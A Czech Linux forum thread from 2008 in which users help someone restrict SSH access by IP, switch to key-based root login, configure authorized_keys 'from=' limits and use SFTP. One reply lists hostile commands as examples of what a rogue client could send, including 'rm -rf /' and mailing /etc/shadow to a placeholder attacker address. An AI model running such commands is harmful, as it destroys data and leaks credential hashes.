abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 22:11 | Nová verze

    Byla vydána nová verze 24.2 linuxové distribuce Manjaro (Wikipedie). Její kódové jméno je Yonada. Ke stažení je v edicích GNOME, KDE PLASMA a XFCE.

    Ladislav Hagara | Komentářů: 0
    dnes 02:11 | Nová verze

    Open source platforma Home Assistant (Demo, GitHub, Wikipedie) pro monitorování a řízení inteligentní domácnosti byla vydána ve verzi 2024.12.

    Ladislav Hagara | Komentářů: 2
    dnes 01:11 | Nová verze

    Byla vydána verze 31.0 svobodného softwaru OBS Studio (Open Broadcaster Software, Wikipedie) určeného pro streamování a nahrávání obrazovky počítače. Přehled novinek na GitHubu. Instalovat lze také z Flathubu.

    Ladislav Hagara | Komentářů: 0
    včera 02:44 | Nová verze

    Emulátory Box86 a Box64 umožňující spouštět linuxové aplikace pro x86 a x86_64 na jiných než x86 a x86_64 architekturách, například ARM a ARM64, byly vydány v nových verzích: Box86 0.3.8 a Box64 0.3.2. Ukázka možností na YouTube.

    Ladislav Hagara | Komentářů: 0
    6.12. 20:55 | Nová verze

    Byla vydána nová verze 6.1 neměnné (immutable) distribuce openSUSE Leap Micro určené pro běh kontejneru a virtuálních strojů. S vydáním verze 6.1 byla ukončena podpora verze 5.5.

    Ladislav Hagara | Komentářů: 0
    6.12. 19:55 | IT novinky

    Poslanci dnes ve třetím čtení schválili návrh zákona o digitálních financích. Cílem zákona je implementace předpisů Evropské unie v oblasti digitálních financí, konkrétně nařízení DORA (Digital Operational Resilience Act) o digitální provozní odolnosti finančního sektoru a nařízení MiCA (Markets in Crypto Assets) o trzích kryptoaktiv. Zákon nyní míří k projednání do Senátu ČR. U kryptoměn bude příjem do 100 tisíc Kč za zdaňovací období osvobozen od daně, podobně jako u cenných papírů, a to za podmínky jejich držení po dobu alespoň 3 let.

    Ladislav Hagara | Komentářů: 19
    6.12. 19:11 | Komunita

    O víkendu (15:00 až 23:00) proběhne EmacsConf 2024, tj. online konference vývojářů a uživatelů editoru GNU Emacs. Sledovat ji bude možné na stránkách konference. Záznamy budou k dispozici přímo z programu.

    Ladislav Hagara | Komentářů: 2
    6.12. 10:22 | Nová verze

    Mozilla má nové logo a vizuální identitu. Profesionální. Vytvořeno u Jones Knowles Ritchie (JKR). Na dalších 25 let.

    Ladislav Hagara | Komentářů: 22
    5.12. 23:33 | Komunita

    Bylo rozhodnuto, že nejnovější Linux 6.12 je jádrem s prodlouženou upstream podporou (LTS). Ta je aktuálně plánována do prosince 2026. LTS jader je aktuálně šest: 5.4, 5.10, 5.15, 6.1, 6.6 a 6.12.

    Ladislav Hagara | Komentářů: 0
    5.12. 15:11 | Nová verze

    Byla vydána nová stabilní verze 3.21.0, tj. první z nové řady 3.21, minimalistické linuxové distribuce zaměřené na bezpečnost Alpine Linux (Wikipedie) postavené na standardní knihovně jazyka C musl libc a BusyBoxu. Z novinek lze vypíchnou počáteční podporu architektury Loongson LoongArch64.

    Ladislav Hagara | Komentářů: 0
    Rozcestník

    Dotaz: sshd_config - ListenAdress

    12.3.2008 22:31 happymaster23 | skóre: 9
    sshd_config - ListenAdress
    Přečteno: 1431×
    Zdravím,

    chci server nastavit tak, aby se k němu dalo připojit pouze z jedné konkrétní IP adresy (což plus netriviální heslo je IMHO slušné zabezpečení). Našel jsem jedno elegantní řešení a to změnit řádku ListenAddress v sshd_config z původního 0.0.0.0 na tu konkrétní IP. Elegantní řešení do bylo do té doby, než jsem zjistil, že nefunguje (na server se nedalo připojit odnikud).

    Zatím vše testuji v síti s lokálními IP na distribuci CentOS. Nevíte proč to nefunguje? Znáte nějaké elegantnější řešení?

    Díky za odpovědi

    Odpovědi

    12.3.2008 22:52 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    To není adresa na straně klienta, ale adresa, na které poslouchá server, tj. vaše adresa. Jestli chcete filtrovat klienty podle adresy, použijte pravidlo netfilteru. Pokud byste místo hesla používal autentizaci klíčem, šlo by to omezit i nastavením u příslušného klíče v authorized_keys.
    12.3.2008 23:02 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Aha, tak to mi uniklo, špatně jsem si přeložil informaci napsanou na http://www.faqs.org/docs/securing/chap15sec122.html

    Takže vyrobím pravidlo v iptables...

    Díky za odpověď
    13.3.2008 13:24 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Takže jsem to vyřešil takto: Do sshd_config jsem přidal AllowUsers root a tím pádem nemusím uživatelům, u kterých nechci ssh přístup nastavovat prázdnou shell. Dále jsem tam změnil port na 12345. Iptables by v defaultní konfiguraci (CentOS 5) měl zahazovat vše u čeho nemá výjimku, takže jsem pomocí setup vypnul díru pro SSH a potom zkontroloval patřičný soubor /etc/sysconfig/iptables jestli je to správně uložené. Potom jsem pomocí iptables -A INPUT -s xxx.xxx.xxx.xxx -p tcp --destination-port 12345 -j ACCEPT vytvořil díru.

    No kdyby to fungovalo, tak bych sem nepsal. Problém je v tom, že firewall propouští naprosto vše. Spuštěný by být měl.
    13.3.2008 13:45 lieko
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    #iptables -nvL

    a uvidis ako mas nastaveny firewall
    14.3.2008 12:57 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Dále jsem tam změnil port na 12345

    Smysl tohoto opatření mi poněkud uniká, ale na toto téma se tu flamovalo už tolikrát a tak intenzivně, že než začnete protestovat, najděte si některou z těch starších diskusí.

    14.3.2008 13:45 matoo | skóre: 7
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    pride mi troska nelogicke vidiet vyhodu nemusiet nastavovat prazdny shell proti moznosti povolenia root cez ssh ..
    pravda je, ze nechapem presne, co chces tym dosiahnut .. bud ma mat user shell na masine, alebo nema .. a ti uzivatelia, ktori maju shell este stale nemusia mat pravo su-idnut sa na root-a.. ak sa bavime o bezpecnosti, tak moznost povolit root cez ssh by som IMHO vylucil ako prvu vec .. niekto tu uz dole spomenul, ak potrebujes zabezpecit len urcitu skupinu ludi, ktora ma mat ssh pristup na masinu, povol logovanie cez ssh len prostrednictvom klucov ..
    ..my server has more fans than britney..
    14.3.2008 13:49 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    ak sa bavime o bezpecnosti, tak moznost povolit root cez ssh by som IMHO vylucil ako prvu vec

    A proč to? Protože se to dělá?

    14.3.2008 14:02 matoo | skóre: 7
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    heh :) aj to mozno dovod .. ale urcite ten som nemal na mysli ..

    snazim sa potencionalnemu utocnikovi (ci je to uz len obycajny script kiddie alebo niekto inteligentnejsi) poskutnut co najmenej informacii k utoku .. jednou z uzitocnych informacii je prave login .. samozrejme, nie postacujucich, ale nutnych ..

    ..my server has more fans than britney..
    14.3.2008 14:45 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Raději si přečtěte některou z těch starších diskusí, kde jsem vysvětloval, proč takové opatření nemá žádný efekt kromě dobrého pocitu, že jste něco udělal.
    14.3.2008 15:06 matoo | skóre: 7
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    v tomto vlakne spomenuta nie je, ak mas na mysli nejaku konkretnu, pastni (predsa nebudem hladat kvoli tomu teraz tvoje prispevky, ked ty mas nejaky konkretny na mysli)..
    osobne, ako aj autori a prispevatelia inych OS (fbsd napriklad) zdielaju taky podobny nazor .. ja sa k nemu priklanam a pokial server nie je v chranenom (trusted) enviromente (tu chap ako server chraneny inymi sietymi prvkami a bezpecnostnymi opatreniami), tak je to dobry krok .. ostatne tak je to aj s tym portom 22 (nizsie v diskusii) .. neodradi kazdeho, skusenejsiemu utocnikovi to nevadi a teda neodradi .. ale odradi to urcitu skupinu ludi, hence je ten server o cosi bezpecnejsi ..
    ovsem moj nazor, moje nastavenie ..
    ..my server has more fans than britney..
    14.3.2008 16:03 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Opravdu se mi nechce opakovat znovu a znovu stejnou debatu, své důvody, proč neuznávám "security by obscurity" řešení, jsem už několikrát napsal a vysvětlil. Pokud vás zajímají, najděte si je, pokud ne, je to váš boj. Jen jsem nemohl nechat bez komentáře příspěvky tvářící se, jako by schovávání sshd na nestandardní port nebo vynucování dvoustupňového přihlášení bylo něco samozřejmého nebo to přinášelo nějaké zvýšení bezpečnosti systému. Formulace typu "ak sa bavime o bezpecnosti … ako prvu vec" rozhodně nejsou na místě.
    14.3.2008 16:20 matoo | skóre: 7
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    ax, jaj .. ono ten paste linky na diskusiu je tazke opakovanie, to jo ..
    mno vidis, ja tvrdim, ze je to urcity stupen ochrany (toto je dolezite slovicko, pretoze je dolezite pred kym sa hlavne chranim), ale formuloval som to typom IMHO - teda podla mojho nazoru .. podla mojho vysvetlenia, podla mojho chapania .. tym, ze taketo chapanie ma viacej ludi, ma viac priklana k myslienke, ze je to k veci a ma zmysel (!i ked stale nemozno vylucit, ze sa mozem mylit)

    takze, ked len zhrniem moj prispevok, IMHO nechat povolit root na login nie je spravne riesenie ..

    ..my server has more fans than britney..
    14.3.2008 16:43 matoo | skóre: 7
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    mno aby to nebolo z mojej strany tak trosku `tupe', dal som si vyhladat tu diskusiu, predpokladam, ze sa jedno o tuto diskusiu.. je to troska dlhsie, obsahujuce linky na dalsie dokumenty, toz mi to bude trvat dlhsie, kym to precitam cele .. schvalne ma zaujimaju tvoje argumenty, za ktorymi si tak presvedcivo stojis ..
    ..my server has more fans than britney..
    14.3.2008 17:26 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Vidím, že se tady rozvinul pěkný flame. Momentálně řeším problém zálohy a jakmile vyřeším toto, začnu reagovat a zkoušet konkrétní možnosti zabezpečení. Nicméně abyste se měli čeho chytit (konkrétně vy dva :D), tak napíšu kde server bude a jak si to zabezpečení představuji.

    Bude se jednat především o webserver vystrčený přímo do internetu, tudíž jediný uživatel s shell přístupem bude root, ostatní uživatelé se budou přihlašovat maximálně přes ftp. Fyzický přístup ke stroji budu mít pouze já.

    Zabezpečení si představuji tak, že ssh poběží na nějakém nestandardním portu a ještě k tomu se bude moci připojit pouze z jedné konkrétní ip adresy. Netrivální heslo je samozřejmostí. Možná mi chybí trocha fantazie, ale nedovedu si představit, jak by se někdo mohl připojit na roota (či jakéhokoliv jiného uživatele), když nebude vědět ani port a zdaleka ne ani IP adresu, kterou by případně měl podstrčit. Když bude na konci sedět netriviální heslo... ...vy si to dovedete představit, že by to někdo obešel?
    14.3.2008 19:22 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Portů je 65536, to není zas tak mnoho, aby je nemohl vyzkoušet všechny. Takže „nebude vědět port“ si v zabezpečení škrtněte. Silné heslo je rozumný způsob zabezpečení, ale klíč pro asymetrickou kryptografii je lepší. Omezení na jednu IP adresu je z hlediska zabezpečení přidání dalšího stupně zabezpečení – zvlášť pokud omezení na IP adresu bude aplikováno ještě před samotným sshd démonem, takže tím omezíte útočníkovi prostředky i v případě, že by se snažil napadnout sshd démona samotného (a obejít tak autorizaci klíčem/heslem). Ovšem na druhou stranu je potřeba zvážit to, zda se nebudete někdy potřebovat k počítači připojit odjinud. Pokud máte celkem snadný fyzický přístup k počítači, problém to být nemusí. Pokud je ale ten přístup k hardwaru složitý, neriskoval bych, že z nějakého důvodu nebudu schopen se k serveru připojit z určené IP adresy a tudíž nebudu schopen se serverem dělat nic.
    14.3.2008 19:26 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Ovšem na druhou stranu je potřeba zvážit to, zda se nebudete někdy potřebovat k počítači připojit odjinud.

    Nebo jestli se ta adresa nezmění a nedozvíte se o tom na poslední chvíli (nebo dokonce až potom). I to už jsem bohužel zažil…

    14.3.2008 20:39 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Díky za odpověď,

    ve smlouvě o připojení k internetu (Radiokomunikace) mám uvedenou pevnou veřejnou IP adresu, tzn. pokud by se "náhodou" změnila, tak by ji museli urychleně vrátit na původní, jinak by smlouvu porušili (a taky se to za dva a půl roku co připojení mám nestalo). S notebookem se (mimo domova - kde je ona pevná statická IP) připojuji jenom v síti, kde kvůli nějaké (pro mě nepochopitelné) snížené inteligenci administrátora je povolen pouze port 80, takže tato možnost taky padá. Kdyby se přecejenom z nějakého důvodu adresa změnila a já nestihl provést úpravu na novou, tak mám možnost využít KVMoverIP a i kdyby toto selhalo, tak pěkný výlet taky není k zahození, alespoň se člověk trošku provětrá :D.

    Použití klíče mám určitě v plánu nasadit, ale vzhledem k tomu, že mě honí čas tak to na dobu neurčitou udělám zatím tak.

    Jak byste ohodnotili "mnou navržený" systém zabezpečení (změna portu, přístup pouze z jedné IP, netriviální heslo) známkou jako ve škole co se bezpečnost týče?

    Co vy osobně považujete za netriviální heslo - příklad?

    Díky moc za odpovědi
    14.3.2008 21:26 lieko
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    netrivialne heslo : %Rg5[We_L4.dsq!)
    14.3.2008 21:34 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Ale jo :D, díky za inspiraci. Asi nějaké takové zvolím, budu si ho ale ze začátku muset někam napsat :D
    14.3.2008 22:00 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Použití klíče mám určitě v plánu nasadit, ale vzhledem k tomu, že mě honí čas tak to na dobu neurčitou udělám zatím tak.

    Ono to není zase tak složité. Základní princip je ten, že na straně klienta vygenerujete pomocí ssh-keygen pár klíčů (např. 'ssh-keygen -t dsa -b 1024') a veřejný (v tomto případě ~/.ssh/id_dsa.pub) pak zkopírujete na server do '~/.ssh/authorized_keys'.

    Jak byste ohodnotili "mnou navržený" systém zabezpečení (změna portu, přístup pouze z jedné IP, netriviální heslo) známkou jako ve škole co se bezpečnost týče?

    Známkování snad raději ne, spíš slovní hodnocení. Změna portu: k ničemu. Omezení na jednu IP: bezesporu užitečné, ale důkladně bych si rozmyslel možné důsledky. Netriviální heslo: nezbytné.

    Co vy osobně považujete za netriviální heslo - příklad?

    Tady hodně záleží na tom, co tím heslem chráníte. Pro roota na počítači s možností autentizace heslem přes ssh bych asi použil výstup 'pwgen 12' nebo 'pwgen -s 8'

    15.3.2008 08:32 alkoholik | skóre: 40 | blog: Alkoholik
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Heslo na roota - v zadnem pripade! Jedine klice.
    Taky si zkus najit, jak funguje portknock. Vrele doporucuju k ochrane ssh portu.
    15.3.2008 13:26 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Nuže dobrá, ukecali jste mě pro použití klíče ;).

    Takže jsem si pomocí PuTTYgen vygeneroval pár. Private jsem uložil k sobě a v PuTTY ho nastavil (SSH - Auth). Potom je public přenesl do serveru do /root/.ssh/authorized_keys. Trošku jsem zkoušel laborovat s sshd_config, ale moc to nepomohlo. Co tam tedy konkrétně nastavit, aby se mohl přihlašovat pouze root (to bude pravděpodobně AllowUsers root) a potom tedy zakázat přihlašování pomocí hesla a povolit přihlášení pouze pomocí klíče. Dále kdosi zde v diskusi říkal, že když tedy použiji klíč, tak se dá někde přímo u toho klíče nastavit přihlášení pouze z jedné konkrétní IP.

    Ve zkratce tedy - jak nastavit, aby se bylo možné přihlásit pouze na roota, pouze klíčem a pouze z jedné konkrétní IP (pomocí pravidel u klíčů).

    Openssh-server mám ve verzi 4.3p2.

    BTW jaký typ klíče bych měl použít - SSH-2 RSA a nebo SSH-2 DSA? Kolik by měl mí bitů?

    Díky moc za rady

    P.S.: Jak moc je tohle bezpečné? Vy ve mě pěstujete pěknou paranoiu :D
    15.3.2008 21:16 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    a potom tedy zakázat přihlašování pomocí hesla

    pro roota 'PermitRootLogin without-password', obecně 'PasswordAuthentication no'.

    Dále kdosi zde v diskusi říkal, že když tedy použiji klíč, tak se dá někde přímo u toho klíče nastavit přihlášení pouze z jedné konkrétní IP.

    Na začátek řádku s klíčem přidejte klauzuli from, např.

    from="1.2.3.4" ssh-dss AAAAB3NzaC1kc3MAAA...

    Blíže viz sshd(8), sekce AUTHORIZED_KEYS FILE FORMAT.

    BTW jaký typ klíče bych měl použít - SSH-2 RSA a nebo SSH-2 DSA? Kolik by měl mí bitů?

    RSA2 a DSA vyjdou AFAIK nastejno, hlavně ať to není RSA1. Délka pro běžné použití IMHO postačí 1024 bitů.

    18.3.2008 14:56 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Díky za odpověď,

    všechny problémy jsem úspěšně vyřešil. Problém číslo jedna (to že iptables propouštěl vše) byl v tom, že jsem z nevědomosti v setupu nastavil síťové rozhraní jako důvěryhodné. Problém s přihlašováním pomocí klíče byl v tom, že jsem opět z nevědomosti v PuTTYgen ten klíč ukládal do souboru, který měl špatný formát, protože PuTTYgen to ukládá na více řádku a ještě tam vkládá komentáře, které OpenSSH nepochopí. Pro účel ukládání do souboru authorized_keys je nahoře pole, ze které se musí kopírovat a tam je vše v pořádku (tedy na jednom řádku).

    Jak jsem hledal informace o správné syntaxi v souboru authorized_keys, tak jsem se dostal na stránky PuTTY, kde jsem náhodou zahlédl, že autoři důrazně nedoporučují NEpoužívat DSS klíč (dál jsem nečetl proč) a že ve vše případech by to měl být pouze RSA2.

    Vygeneroval jsem si projistotu 2048b pár, privátní jsem zahesloval poměrně slušnou passphrase a celý ho uložil na DVD. V authorized_keys jsem přihlášení omezil pouze z mojí IP. Myslím, že je to slušné zabezpečení, ne? ;)

    BTW Jak jsem četl dál vaši diskusi, tak mě zaujala zmíňka o HW klíčích. Už jsem něco takového někde viděl, ale můžete mi dát nějaký odkaz na nějaké dobré řešení vhodné právě pro tento účel?

    P.S.: Každé heslo by se mělo pravidelně měnit, jak moc to platí pro klíče?

    Děkuji za odpovědi
    18.3.2008 15:22 alkoholik | skóre: 40 | blog: Alkoholik
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    S heslem pro klic to mas tezke, protoze ti nekdo muze krast klice a nevedet jejich passphrase a cekat, ze z tebe jednou nejakou starou passphrase dostane.
    To uz je lepsi vymenit cely par.
    Jinak ti vazne doporucuju nastudovat portknock. Muzes se pak vykaslat na omezeni zdrojove adresy a v klidu delat odkudkoliv.
    18.3.2008 16:24 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    kde jsem náhodou zahlédl, že autoři důrazně nedoporučují NEpoužívat DSS klíč (dál jsem nečetl proč)

    Právě to "proč" bývá v podobných důvodech důležitější než sama informace, že to nedoporučují…

    18.3.2008 16:40 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Jak jsem četl dál vaši diskusi, tak mě zaujala zmíňka o HW klíčích. Už jsem něco takového někde viděl, ale můžete mi dát nějaký odkaz na nějaké dobré řešení vhodné právě pro tento účel?

    Mám v plánu zkusit některý z USB tokenů od iKey. Praktické zkušenosti s nimi zatím nemám, ale našel jsem článek, podle kterého by měly v Linuxu fungovat hladce.

    18.3.2008 17:44 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Nějaké info ohledně nebezpečnosti DSA klíče je např. zde http://www.chiark.greenend.org.uk/~sgtatham/putty/faq.html#faq-dsa

    Díky za info na ten token.
    18.3.2008 23:54 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Zdravím,

    když už jsem byl v té zabezpečovací horečce, tak jsem začal zajímat o SFTP. Připadal jsem si jako Alenka v říši divů, když jsem asi po dvou minutách přišel na to, že celý vtip spočívá v tom stáhnout si klienta (v mém případě WinSCP) a přihlásit se pod normálním uživatelem, ftp démon k tomu není potřeba, stačí pouze OpenSSH server...

    WinSCP umožňuje naprosto stejné zabezpečovací mechanismy jako klasický SSH klient (v mém případě PuTTY), tedy vč. klíčů. Na kolik si myslíte, že je bezpečné pomocí takového klienta se přihlašovat přímo pod rootem? IMHO v tom není rozdíl, protože je to klasické SSH spojení akorát s tím rozdílem, že tohle se zaměřuje pouze na práci se soubory. Nicméně předpokládám, že pro běžnou práci (uploadování a úpravy produkčních dat) doporučujete vytvořit uživatele s právy pouze pro tyto data, že? ;)

    Existuje nějaké finta jak zakázat ftp přihlášení globálně všem a povolit jenom vybrané a nebo je nutné každého uživatele, který se má přihlašovat pouze přes SFTP připsat do /etc/ftpusers?

    Při psaní tohoto slohového útvaru mi nově došlo, že uživatel co chce užít služeb SFTP musí být v /etc/sshd_config připsaný v AllowUsers a musí mít validní shell (a to je taky důvod, proč to například de facto žádný hosting moc nenabízí). Tudíž je vhodné běžným uživatelům dávat pouze ftp-only účty (navíc chrootnuté do jejich home, aby nešmejdili po systému) a pro přístup jak ke vlastním produkčním datům plus (produkčním) datům uživatelů (pokud je to podle vás "neprasácké" řešení) použít roota a nebo druhého uživatele, který bude mít home v kořenu toho adresáře, kde budou produkční data plus home ostatních ftp-only uživatelů?

    Díky
    19.3.2008 08:16 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    IMHO v tom není rozdíl, protože je to klasické SSH spojení akorát s tím rozdílem, že tohle se zaměřuje pouze na práci se soubory.
    Ono je to přímo klasické ssh, jenom je sshd nakonfigurováno tak, aby tyhle příkazy předával ke zpracování nějakému dalšímu programu. Takže implementace té ssh části je ve vašem případě OpenSSH.
    Nicméně předpokládám, že pro běžnou práci (uploadování a úpravy produkčních dat) doporučujete vytvořit uživatele s právy pouze pro tyto data, že? ;)
    Ano. Zvlášť jestli to má být pro někoho dalšího – asi by nebylo dobré nechat běžné uživatele editovat třeba /etc/passwd, /etc/shadow atd.
    uživatel co chce užít služeb SFTP musí být v /etc/sshd_config připsaný v AllowUsers a musí mít validní shell
    Nemusí to být ale plnohodnotný shell, stačí shell pro sftp – Google na dotaz „sftp shell“ určitě něco nabídne.
    19.3.2008 09:06 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Nemusí to být ale plnohodnotný shell, stačí shell pro sftp – Google na dotaz „sftp shell“ určitě něco nabídne.

    Nejznámější je asi scponly.

    19.3.2008 18:28 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Díky za odpovědi,

    přemýšlel jsem o tom a došel jsem k faktu, že přidělávat extra pro mě nového uživatele, který bude mít přístup pouze k produkčním datům je vcelku zbytečné, protože při přihlášení přes WinSCP nemám co zkazit, potažmo můžu zkazit maximálně to stejné, jako když se na roota přihlašuji standardně přes PuTTY. Prostě v těch právech a síle zabezpečení není rozdíl, něco jiného by bylo, kdybych se s rootem přihlašoval přes normální FTP, to by byla echt prasárna :D, ale vzhledem k tomu, že je to naprosto stejné spojení jako přes PuTTY tak v tom nevidím potenciální bezpečnostní problém - vy ano? Napadlo mě víceméně jedno možné ohrožení - přestože (jak jsem stihl zjistit) je WinSCP špičkový SFTP klient (pro Windows asi nejlepší) tak i přesto by nemusel být oproti PuTTY naprosto stabilní, odladěný a bezchybný a ten klient sám o sobě by mohl být bezpečnostním rizikem - jsou tyto obavy oprávněné a nebo se jedná o kvalitní kus softwaru, kterému se dá věřit (stejně jako PuTTY)?

    Díky za odpovědi

    BTW neměl bych na tenhle dotaz založit raději nové vlákno?
    19.3.2008 19:59 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Klasický bezpečnostní problém typu buffer overflow nemá v tomto případě smysl řešit, protože se jedná o klientskou aplikaci (a pokud vám na datech na klientovi záleží, přihlašujte se z Windows z účtu s minimálními právy). Takže jediné, co by mohl klient zkazit, by bylo kdyby např. poslal příkaz rm -rf /, shutdown -h now, sendmail cracker@example.com < /etc/shadow apod. A to „omylem“ udělá jen těžko. Protože nemá WinSCP veřejné zdrojové kódy, nedá se mu samozřejmě věřit tolik jako PuTTY, ale nepovažoval bych ho za nebezpečný. Rozhodně je daleko pravděpodobnější, že si ty soubory smažete nějakým omylem sám… Jinak pokud byste trval na PuTTY a nevadil by vám příkazový řádek, i PuTTY má klienta pro SFTP.
    BTW neměl bych na tenhle dotaz založit raději nové vlákno?
    Raději ne, protože to by byl dotaz na program čistě pro Windows, a to by nemuselo projít ;-)
    19.3.2008 20:21 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Díky za odpověď,
    ...a pokud vám na datech na klientovi záleží
    Nechtěl jste místo klient napsat server?

    Takže pokud to shrneme, je to podle vás bezpečná cesta i pro přihlášení pod rootem? WinSCP otevřené kódy má...

    BTW - Co se dá zkazit příkazem shutdown -h now? :D
    19.3.2008 20:38 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Nechtěl jste místo klient napsat server?
    Nechtěl. Měl jsem na mysli útok, kdy jedna komunikující strana zneužije nějaké díry v programu a ovládne jej a získá tak možnost spouštět s právy uživatele, který spustil program. A protože jste se ptal na klienta WinSCP, znamenalo by to, že by útočník přes sshd server zneužil případnou chybu ve WinSCP a získal tak kontrolu nad klientským počítačem. Ovšem pokud se s tím WinSCP chcete připojovat jen na vlastní server, měl byste v takovém případě starosti spíš s útočníkem na serveru, než s tím, že se vám snaží ještě přes WinSCP ovládnout klientský počítač. Jinak to celé bylo myšleno spíš žertem. Ale třeba u webu už tenhle princip (kdy je potřeba chránit hlavně server) neplatí, tam musí proti útoku druhé strany být odolný nejen server, ale i prohlížeč. Ale to už je zcela mimo téma.
    WinSCP otevřené kódy má...
    No jo, GPL… Jak jsem přišel na to, že WinSCP patří k těm programům, jejich autor nepovažuje zveřejnění zdrojáků za přínos projektu? Podle Wikipedie byly zdrojáky pod GPL zveřejněny v roce 2003, tak že bych si pamatoval něco z předchozí doby?
    Co se dá zkazit příkazem shutdown -h now?
    Je to celkem dobrý DoS útok – počítač pak přestane poskytovat služby, které by poskytovat měl. Sice to není takový průšvih, jako kdyby vám někdo něco cracknul nebo získal přístup k něčemu, k čemu přístup mít nemá, ale problém je to taky.
    19.3.2008 21:04 happymaster23 | skóre: 9
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Podle souborů co jsou na sourceforge.net (http://sourceforge.net/project/showfiles.php?group_id=85589) je zdroják minimálně stejně očíslovaný jako poslední verze.

    Chci se přihlašovat pouze na můj server, měl jsem tedy namysli ochranu nikoli mojí klientské stanice, ale mého serveru, na který se chci pod rootem přes WinSCP přihlašovat. Ikdyž zabezpečení mých oken vcelku věřím, tak jsem měl namysli zneužití nějaké chyby WinSCP, která by mohla uškodit mému serveru. Tím mám namysli třeba nějaké mezery v implementaci zabezpečení či samotného přihlašování pomocí klíče, které by nemuselo být tak robustní, jako má PuTTY.

    Může být nějaký problém v tom, že vlastníkem souborů, které se budou veřejně přístupné pomocí http, bude root?

    Jinak to je hodně zajímavý DoS útok, prostě se vypne stroj a oběť má utrum :D
    19.3.2008 21:30 Filip Jirsák | skóre: 68 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Tím mám namysli třeba nějaké mezery v implementaci zabezpečení či samotného přihlašování pomocí klíče, které by nemuselo být tak robustní, jako má PuTTY.
    Jedině že by WinSCP vyzradil heslo k privátnímu klíči nebo klíč samotný. Jinak „síla“ šifrování nezávisí na klientovi, ta je určená použitým protokolem.
    Může být nějaký problém v tom, že vlastníkem souborů, které se budou veřejně přístupné pomocí http, bude root?
    Web server musí ty soubory vidět, tj. buď musí být pro čtení všem nebo pro skupinu, ve které musí být i uživatel, pod kterým běží server. Jinak pokud to nejsou spustitelné soubory s nastaveným suid bitem, ničemu nevadí, že je vlastní root.
    Jinak to je hodně zajímavý DoS útok, prostě se vypne stroj a oběť má utrum :D
    Po fyzické likvidaci serveru je to hned druhý nejúčinnější způsob ;-)
    14.3.2008 17:34 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    Spíš jsem měl na mysli tuhle. Tam jsem se kritice myšlenky "dvě hesla znamenají dvakrát větší bezpečí" věnoval celkem podrobně (tedy nejen já).
    16.3.2008 15:17 matoo | skóre: 7
    Rozbalit Rozbalit vše Re: sshd_config - ListenAdress
    konecne som si nasiel cas precitat nejake tie prispevky .. uz si na teba spominam, hlavne na tvoju tvrdohlavost.. nie moc casto prispievam do diskusii v abclinuxu, ale s tebou som uz mal vymenu nazorov a nejake ine som si pozrel..
    ono v podstate s tebou suhlasim:
    • login je vo vela pripadoch casto lahko uhadnutelny a nie je to tajny udaj - svoj effort by som mal presmerovat na zlozitejsie heslo a nie login - tym padom je jedno ci je to uzivatel mato alebo root
    • skryvanie ssh na iny port prakticky nezmysel - zistitelne prakticky okamzite
